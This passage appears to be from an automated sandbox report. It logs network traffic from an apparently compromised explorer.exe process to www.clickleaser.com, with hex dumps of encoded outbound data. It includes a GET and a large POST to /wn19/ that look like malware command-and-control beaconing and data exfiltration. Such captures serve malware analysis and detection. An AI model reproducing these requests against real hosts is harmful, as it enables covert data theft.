May 10, 2022 14:25:23.529736996 CEST	9391	OUT	Data Raw: 7e 66 4d 64 32 6f 61 6c 39 71 79 6f 75 5a 4b 6a 79 6c 51 75 33 59 47 42 63 5a 69 6a 36 57 46 39 34 63 41 58 50 49 7e 7a 6a 4b 56 58 61 43 51 32 4e 6c 4b 68 49 78 6b 63 6f 51 45 4b 38 37 57 6f 7a 55 4f 6b 45 6d 47 6d 66 58 47 48 49 45 32 45 7a 54 Data Ascii: ~fMd2oal9qyouZKjylQu3YGBcZij6WF94cAXPI~zjKVXaCQ2NlKhIxkcoQEK87WozUOkEmGmfXGHIE2EzTYDDBmuMleGlWBu0zLRKG~MYsB38LhCcobrEzILq4kq(ub2pI0jUavorv8osSK13NajcBhZ(eKr4pF5z5ZM2Ntet2lR3tc5lITJ2mehLv~6VQXCPRuXG4kYkUnBiLTbkXO9WDEm0DNMHqotjgcIDFuu4mzRz9MuoFJ
May 10, 2022 14:25:23.529923916 CEST	9406	OUT	Data Raw: 64 64 75 6d 78 5f 64 4a 63 37 6a 49 53 4c 56 79 37 7a 4c 4b 4b 71 57 5f 6b 5a 55 75 6c 74 4b 6c 4f 45 31 59 57 46 65 78 50 66 47 63 56 33 49 77 55 57 75 64 70 65 6a 79 46 76 4a 41 56 77 62 57 54 41 61 4d 33 72 46 50 58 4b 65 57 35 47 63 44 35 79 Data Ascii: ddumx_dJc7jISLVy7zLKKqW_kZUultKlOE1YWFexPfGcV3IwUWudpejyFvJAVwbWTAaM3rFPXKeW5GcD5yqCRV9x9ksfhzV57gAWpw9arQOhGpG1HFVpPt411zgEwr1Qd3YwT-OndqBfRz(bsOOw5C5KkyJeTO8lfJ2XTqo4iyX08kWDwFjNzwIAHI8rR2(Gnniy9i3J3jeeXcE5OFUrqW86z4j3IkmQeCZN2PfL7aMz94tsPt1
May 10, 2022 14:25:23.542275906 CEST	9409	OUT	Data Raw: 35 30 68 33 49 50 33 4d 4d 55 34 46 71 39 47 49 56 36 68 7a 32 51 46 70 75 46 4b 4f 31 77 63 4b 54 37 45 6e 62 49 48 44 37 70 43 58 36 43 50 5f 46 4f 61 42 79 74 4e 6e 31 58 6d 6b 45 62 7a 59 6e 30 47 6a 74 51 45 72 30 6f 42 62 63 57 76 76 4e 44 Data Ascii: 50h3IP3MMU4Fq9GIV6hz2QFpuFKO1wcKT7EnbIHD7pCX6CP_FOaBytNn1XmkEbzYn0GjtQEr0oBbcWvvNDPuiYWPbVgwMc8DePT6bu9znwi7JdhIsQc0hLVdJA676jkGbQBCh1DvmEaW7px_9yePA_XGe72EFOvDUnRLLkhl2gNg1TaJqDEHhmOOVkxLjP(yvIjnMeYcdOpmqgO7QrEsbVA3s-SEoqKhgM7ze44LoAyGNgskn7w
May 10, 2022 14:25:23.542452097 CEST	9414	OUT	Data Raw: 52 53 39 5a 42 4a 50 53 59 6d 38 44 58 6a 6f 6b 4d 4a 5a 6a 52 50 6c 76 4c 66 62 4c 75 52 52 78 51 38 49 4b 4c 6d 66 75 70 73 64 71 6e 57 71 37 43 74 61 74 38 32 4d 79 4e 63 68 6b 41 6d 37 73 48 45 70 4c 55 36 70 49 31 36 6f 36 68 74 67 62 59 58 Data Ascii: RS9ZBJPSYm8DXjokMJZjRPlvLfbLuRRxQ8IKLmfupsdqnWq7Ctat82MyNchkAm7sHEpLU6pI16o6htgbYXho1otaq2bDVR9IU5ad2UC5HTmdDcFUW0T2uMuilfUDybPRuKwdP0bTtiSGsEqdeSbvlBSqzv93qwSuYiqzxYSD7iDEKxaQuBfK7pcABcM5H3HiS0ABVwbXjVRZKPemPOSob55cCHy49jispuaKVBRBetYhudxV(P3
May 10, 2022 14:25:23.542624950 CEST	9416	OUT	Data Raw: 45 73 33 5f 55 36 53 50 71 6b 45 4f 68 5a 79 2d 70 53 52 54 39 37 4c 30 57 66 34 38 69 6e 70 6a 67 45 41 67 59 76 53 33 75 47 47 66 6a 6b 38 79 75 38 44 33 52 37 35 74 4e 73 72 58 78 65 37 59 32 75 6b 59 73 4d 4b 46 4a 38 55 47 69 35 70 6d 71 76 Data Ascii: Es3_U6SPqkEOhZy-pSRT97L0Wf48inpjgEAgYvS3uGGfjk8yu8D3R75tNsrXxe7Y2ukYsMKFJ8UGi5pmqvN1ikVKNP2Lf4mH2ilCS3W_pCAF5Qocft~qLpW1VwtfLuYn7LBlO2biesmBh9qcKwOKd2xwCG2hJtpR6bvnoPS7OFkMhtmhjl4h07ZkagcjNpGxVX89u8gaBkBmgpREAcWWJRNvGu4JEHQ9LeJb6gU2hXd0SVQJdES
May 10, 2022 14:25:23.542809963 CEST	9425	OUT	Data Raw: 35 61 66 33 37 36 72 33 79 51 35 36 36 6a 49 48 69 61 79 68 34 31 51 71 32 39 4e 52 52 59 65 6d 50 39 43 67 70 6f 55 4d 65 50 46 41 71 6d 63 5f 48 69 7a 65 48 79 53 6e 42 74 76 44 41 2d 76 63 7a 4f 6d 59 67 76 32 31 53 4a 45 68 57 5a 34 33 54 65 Data Ascii: 5af376r3yQ566jIHiayh41Qq29NRRYemP9CgpoUMePFAqmc_HizeHySnBtvDA-vczOmYgv21SJEhWZ43TeY6JaJwg8azArxfbHikwKmh5osZV0McHNWSIlISnmD534fFqqZilh4ALAj_uv5cbaNQpG5suufIwI1kNePOfZCeUvJVkXekDM563TYAb7UVOlEn5Pm2ovAQf7aTKsWzztUGXCxLg8hUCoWr4cxA1i~EuNwC4soZRs8
May 10, 2022 14:25:23.542984962 CEST	9430	OUT	Data Raw: 71 44 56 42 4e 36 32 35 34 45 4f 70 79 4c 65 41 50 53 67 67 30 50 6b 36 72 52 7a 43 50 62 4a 57 62 48 61 4f 49 54 4e 7a 69 52 55 56 32 55 5a 69 64 4e 73 44 31 51 41 6a 38 50 45 71 4a 39 6e 42 66 59 4b 39 65 6e 38 68 52 4f 74 5a 62 34 53 67 42 78 Data Ascii: qDVBN6254EOpyLeAPSgg0Pk6rRzCPbJWbHaOITNziRUV2UZidNsD1QAj8PEqJ9nBfYK9en8hROtZb4SgBxiUC-d_ziEmvM7bBYsr7F5ZbXBNHs47YpE8t8031lNxSQ4sBuDTx4rzmYj4IAQj(8Uv2qLNdzBECs6yDSDlMfJHqMogZ_x61Y0lIQStsE0J3Wf8ESPulcTtWSyag-djz7wcY_Jc0bcO1R5kScCFslv9qVrnWdMl3Dw
May 10, 2022 14:25:23.590347052 CEST	9598	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Tue, 10 May 2022 12:25:23 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~\|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.11.20	49770	198.23.49.173	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 10, 2022 14:26:24.113207102 CEST	9600	OUT	GET /wn19/?AVnXAh=q67zoIOMf4+mO4D8EIqIf3d7IvOeBQOSx5x5Cm6B2nNhbRkYSectWIWbwYJ7UqoIixMy&Vb3pDf=BHT0MRp HTTP/1.1 Host: www.clickleaser.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 10, 2022 14:26:24.624233007 CEST	9602	IN	HTTP/1.1 404 Not Found Date: Tue, 10 May 2022 12:26:24 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.clickleaser.com/wp-json/>; rel="https://api.w.org/" Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 66 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 63 64 6e 2e 63 6c 69 63 6b 6c 65 61 73 65 72 2e 63 6f 6d 27 20 2f 3e 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 43 6c 69 63 6b 20 4c 65 61 73 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 61 70 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 43 6c 69 63 6b 20 4c 65 61 73 65 72 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 63 6b 6c 65 61 73 65 72 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 43 6c 69 63 6b 20 4c 65 61 73 65 72 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 63 6b 6c 65 61 73 65 72 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 33 2e 31 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 Data Ascii: 1f08<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel='dns-prefetch' href='//cdn.clickleaser.com' /><title>Page not found – Click Leaser</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//www.google.com' /><link rel='dns-prefetch' href='//maps.googleapis.com' /><link rel='dns-prefetch' href='//www.googletagmanager.com' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="Click Leaser » Feed" href="https://www.clickleaser.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Click Leaser » Comments Feed" href="https://www.clickleaser.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/72x72\/","ext":".png","svgUrl":"http
May 10, 2022 14:26:24.624311924 CEST	9603	IN	Data Raw: 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 33 2e 31 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 Data Ascii: s:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.clickleaser.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.9.3"}};/! This file is auto-generated /!function(e,a,t){var n,r,o,i=a.
May 10, 2022 14:26:24.624366999 CEST	9604	IN	Data Raw: 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 74 2e 73 75 70 70 6f 72 74 73 5b 6f 5b 72 5d 5d 2c 22 66 6c 61 67 22 21 3d 3d 6f 5b 72 5d 26 26 28 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 Data Ascii: =t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.ready
May 10, 2022 14:26:24.624418974 CEST	9606	IN	Data Raw: 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 61 6e 63 79 62 6f 78 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6c 69 63 6b 6c 65 61 73 65 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f Data Ascii: tylesheet' id='fancybox-css' href='http://www.clickleaser.com/wp-content/plugins/hivepress/assets/css/fancybox.min.css?ver=1.6.2' media='all' /><link rel='stylesheet' id='slick-css' href='http://www.clickleaser.com/wp-content/plugins/hivepr
May 10, 2022 14:26:24.624473095 CEST	9607	IN	Data Raw: 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6c 69 63 6b 6c 65 61 73 65 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 68 69 76 65 70 72 65 73 73 2d 62 6c 6f 63 6b 73 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 72 6f 6e 74 Data Ascii: f='http://www.clickleaser.com/wp-content/plugins/hivepress-blocks/assets/css/frontend.min.css?ver=1.0.0' media='all' /><link rel='stylesheet' id='hivepress-bookings-css' href='http://www.clickleaser.com/wp-content/plugins/hivepress-bookings/
May 10, 2022 14:26:24.624527931 CEST	9608	IN	Data Raw: 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 68 69 76 65 70 72 65 73 73 2d 72 65 76 69 65 77 73 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 72 6f 6e 74 65 6e 64 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 31 2e 32 2e 35 27 20 6d 65 64 69 Data Ascii: m/wp-content/plugins/hivepress-reviews/assets/css/frontend.min.css?ver=1.2.5' media='all' /><link rel='stylesheet' id='wp-block-library-css' href='http://www.clickleaser.com/wp-includes/css/dist/block-library/style.min.css?ver=5.9.3' media='
May 10, 2022 14:26:24.624567986 CEST	9609	IN	Data Raw: 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 Data Ascii: te cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;position:relative;font-style:normal}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-al
May 10, 2022 14:26:24.624640942 CEST	9610	IN	Data Raw: 32 30 30 30 0d 0a 6e 67 2d 6c 65 66 74 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d Data Ascii: 2000ng-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-group:where(.has-background){padding:1.25em 2.375em}.wp-block
May 10, 2022 14:26:24.624703884 CEST	9612	IN	Data Raw: 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 63 2d 62 6c 6f 63 6b 73 2d 73 74 79 6c 65 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6c 69 63 6b 6c 65 61 73 65 72 2e Data Ascii: /><link rel='stylesheet' id='wc-blocks-style-css' href='http://www.clickleaser.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style.css?ver=7.2.2' media='all' /><style id='global-styles-inline-css'>body{--w
May 10, 2022 14:26:24.624764919 CEST	9613	IN	Data Raw: 67 72 61 79 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 33 38 2c 32 33 38 2c 32 33 38 29 20 30 25 2c 72 67 62 28 31 36 39 2c 31 38 34 2c 31 39 35 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,r

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.11.20	49771	198.23.49.173	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 10, 2022 14:26:26.762187958 CEST	9620	OUT	POST /wn19/ HTTP/1.1 Host: www.clickleaser.com Connection: close Content-Length: 227520 Cache-Control: no-cache Origin: http://www.clickleaser.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.clickleaser.com/wn19/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 41 56 6e 58 41 68 3d 69 59 33 4a 32 73 6a 38 66 34 79 55 64 66 50 79 4e 34 72 59 49 77 49 59 44 36 57 5f 4c 7a 4c 4d 6c 4d 78 35 57 58 7a 57 79 79 35 61 5a 79 63 5a 44 5f 4e 31 61 66 6a 45 6a 61 56 5a 63 4d 4d 39 39 7a 63 4a 6a 78 62 76 63 49 72 78 34 65 4d 69 49 58 45 61 78 74 4b 36 5a 34 68 2d 63 37 71 6c 63 41 43 4b 53 4f 36 52 31 4c 45 7a 46 66 50 54 6e 73 5a 6c 45 45 73 6e 45 4c 57 57 4f 66 31 58 7a 63 71 59 79 54 47 49 44 77 69 51 41 43 54 71 6c 31 76 6d 6e 55 4d 4a 53 69 66 56 69 4b 7e 6f 6d 68 49 38 7a 58 75 34 65 38 59 78 4c 69 54 66 5a 45 41 67 4b 6f 74 73 6c 47 50 32 46 30 75 33 35 44 56 4d 51 6c 69 61 41 30 54 73 28 72 48 71 72 54 7e 6c 34 77 72 6d 50 58 4a 63 65 33 48 32 51 6d 61 43 38 56 48 36 55 32 38 33 55 6a 49 6b 36 4a 46 4e 4a 5f 78 69 77 5a 6e 6d 58 30 5a 67 43 57 45 70 58 2d 54 6b 6f 77 56 57 71 4a 43 54 42 71 41 5a 67 68 56 37 65 45 30 4f 51 30 48 72 42 76 41 35 65 32 4d 49 6e 43 77 33 57 4c 4c 32 51 52 7a 4e 32 65 72 63 7a 37 36 65 67 7a 7a 79 76 73 4d 55 63 55 78 6b 7a 33 33 5f 64 6d 78 57 64 6f 34 7a 36 78 72 79 65 5f 61 65 50 69 51 54 79 63 47 43 56 59 56 55 61 66 7e 31 4a 72 42 67 67 47 32 64 33 35 67 42 53 33 56 72 6f 78 51 2d 78 51 73 53 4e 2d 77 6e 7a 69 53 30 42 55 6f 4e 76 49 6e 50 6d 37 63 68 78 32 59 64 6f 35 41 53 51 4f 41 74 7e 64 50 4b 69 4e 30 45 63 71 6f 41 39 7a 51 76 75 36 67 41 37 6b 59 4a 6e 32 58 45 66 53 68 47 53 36 64 53 4e 35 57 42 35 55 4c 6d 34 39 34 32 47 7a 6b 72 4a 48 7e 36 41 44 64 6d 41 35 71 73 4c 6a 37 53 79 6e 73 6c 76 74 4b 55 79 7a 69 56 28 33 5a 64 37 55 50 56 51 4d 55 69 35 48 50 51 72 4f 77 68 58 53 56 44 4e 36 63 6d 63 6a 34 55 55 4d 53 5a 4a 6b 44 36 6f 35 54 7a 55 36 69 67 39 59 6a 33 59 6d 7a 74 6a 76 68 4b 37 31 7a 69 52 2d 64 31 75 6f 33 67 6b 4a 43 58 76 35 71 72 54 49 50 79 75 6d 6a 5a 38 6c 39 49 76 34 62 5f 37 45 59 5f 6a 4a 76 55 55 4f 45 74 73 32 4e 30 44 37 46 62 35 47 56 2d 7a 46 4a 6f 32 4c 46 63 73 50 65 37 4e 62 42 46 51 6b 54 4d 45 44 28 6b 5a 47 54 79 39 79 65 5a 63 7a 71 31 6f 47 55 76 79 56 69 4d 4d 36 6a 56 70 46 4b 54 37 52 52 70 37 36 58 56 34 7a 46 6f 35 69 70 61 74 55 7e 62 37 65 4a 4e 64 55 6c 74 74 6a 41 4c 38 52 46 65 41 35 57 76 70 59 46 4b 78 79 77 57 66 45 6a 77 6a 4c 66 59 45 54 33 63 65 46 41 51 6a 64 6a 42 28 6e 49 35 7a 54 54 79 7e 36 71 4f 79 34 4e 31 30 74 6d 4b 67 55 57 50 57 45 73 45 44 48 6b 61 36 38 32 34 6e 51 45 63 41 6b 4a 50 58 31 41 4c 4a 6b 58 35 34 73 57 72 4a 6f 42 44 73 42 4c 76 36 32 42 73 6f 68 4a 5a 39 42 6c 36 42 45 73 4b 49 6a 34 67 70 54 75 4e 45 77 4c 79 75 6b 35 63 51 51 45 36 7e 41 6c 65 4c 76 6f 6e 62 70 45 51 6e 6d 4d 47 4e 6c 47 33 76 6c 49 65 46 7a 6c 52 59 69 67 45 4c 48 68 32 4d 62 65 68 64 5f 63 73 4c 57 42 4b 62 33 56 6f 44 70 54 77 4a 79 55 32 68 35 73 38 6e 79 5a 74 72 49 61 37 7a 73 71 78 6a 42 69 70 61 68 76 64 55 76 45 70 52 53 71 55 78 52 6e 62 6f 6f 50 5a 6d 49 4e 2d 69 35 33 31 51 70 63 4d 46 74 6e 6a 45 6b 70 58 44 4d 53 41 28 67 4f 41 4b 31 4d 43 73 6e 47 67 79 6d 76 4c 76 4c 72 49 76 64 34 6f 4e 6c 61 56 48 36 70 4b 76 6d 37 77 44 48 30 57 52 53 77 7a 6a 4d 6a 30 50 68 35 4d 48 51 30 7a 76 4b 4a 48 6d 59 37 31 38 73 49 5f 4f 72 73 61 57 52 4a 76 36 65 35 76 69 48 57 65 4e 59 55 33 51 37 73 6a 4e 30 4f 6a 68 6c 41 66 4c 7a 54 62 4f 72 4f 4c 6f 5f 71 64 31 6b 63 70 78 68 33 54 36 36 6a 2d 42 65 6c 36 72 31 41 59 62 71 6a 30 6c 46 31 37 6e 6e 49 67 71 79 41 54 37 39 46 56 63 7a 54 5a 62 33 62 50 46 39 46 5f 57 76 66 78 69 58 69 51 46 30 64 2d 4e 4f 61 45 58 53 41 33 33 67 70 62 6c 47 46 51 42 50 5a 34 38 5a 34 78 32 46 61 72 61 31 4c 63 55 72 33 42 52 5f 58 4a 4d 66 72 6c 6c 4d 56 4a 5a 51 50 30 49 55 6d 4f 71 73 46 2d 4b 73 64 57 66 75 77 69 46 33 4e 6a 28 31 52 63 7e 4b 4a 4e 76 6f 69 5a 71 78 74 56 66 55 44 65 35 43 42 56 6f 68 35 54 4f 34 52 4a 45 72 41 48 42 4c 49 4a 39 5a 4a 61 4d 33 32 45 74 79 35 34 76 79 55 38 62 6d 35 73 41 37 41 4d 33 32 59 5a 46 69 46 61 65 44 73 75 5a 41 76 45 50 74 6b 37 45 48 61 59 7e 7a 67 49 37 77 35 74 68 55 79 76 45 37 47 76 7e 77 4f 62 45 47 41 30 67 33 68 69 6d 47 57 68 7a 38 48 4d 75 58 79 59 56 64 33 35 33 73 64 68 75 47 46 78 50 70 39 6f Data Ascii: 